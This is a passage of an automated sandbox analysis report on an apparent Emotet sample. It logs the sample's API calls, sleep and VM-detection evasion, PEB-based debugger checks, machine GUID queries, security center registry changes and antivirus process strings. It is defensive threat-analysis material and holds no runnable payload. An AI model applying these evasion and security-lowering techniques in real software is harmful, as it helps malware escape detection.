Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 5356 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5356 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 3_2_02A738F0
Source: svchost.exe, 00000004.00000002.501755488.0000017996C64000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.500177833.000001799182A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`s
Source: svchost.exe, 00000001.00000002.494050614.0000020E88002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.501721455.0000017996C57000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.500021852.0000027766466000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.500101123.0000021FB9C29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000004.00000002.501755488.0000017996C64000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.500177833.000001799182A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`s
Source: svchost.exe, 00000001.00000002.494050614.0000020E88002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.501721455.0000017996C57000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.500021852.0000027766466000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.500101123.0000021FB9C29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 mov eax, dword ptr fs:[00000030h] 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF4E20 mov eax, dword ptr fs:[00000030h] 0_2_02EF4E20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE mov eax, dword ptr fs:[00000030h] 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E70456 mov eax, dword ptr fs:[00000030h] 0_2_02E70456
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E769BE mov eax, dword ptr fs:[00000030h] 0_2_02E769BE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7095E mov eax, dword ptr fs:[00000030h] 0_2_02E7095E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 mov eax, dword ptr fs:[00000030h] 0_2_02EB1030
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 mov eax, dword ptr fs:[00000030h] 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF4E20 mov eax, dword ptr fs:[00000030h] 0_2_02EF4E20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE mov eax, dword ptr fs:[00000030h] 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E70456 mov eax, dword ptr fs:[00000030h] 0_2_02E70456
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E769BE mov eax, dword ptr fs:[00000030h] 0_2_02E769BE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7095E mov eax, dword ptr fs:[00000030h] 0_2_02E7095E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 mov eax, dword ptr fs:[00000030h] 0_2_02EB1030
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73F20 mov eax, dword ptr fs:[00000030h] 3_2_02A73F20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A74E20 mov eax, dword ptr fs:[00000030h] 3_2_02A74E20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F5ABE mov eax, dword ptr fs:[00000030h] 3_2_029F5ABE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F0456 mov eax, dword ptr fs:[00000030h] 3_2_029F0456
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F69BE mov eax, dword ptr fs:[00000030h] 3_2_029F69BE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F095E mov eax, dword ptr fs:[00000030h] 3_2_029F095E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A31030 mov eax, dword ptr fs:[00000030h] 3_2_02A31030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle, 0_2_02EF7EC0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle, 0_2_02EF7EC0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_02A75360
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_02A75360
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000B.00000002.500285558.000001C4ACF02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.500208898.000001C4ACE3D000.00000004.00000001.sdmp Binary or memory string: \REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.500285558.000001C4ACF02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.500208898.000001C4ACE3D000.00000004.00000001.sdmp Binary or memory string: \REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE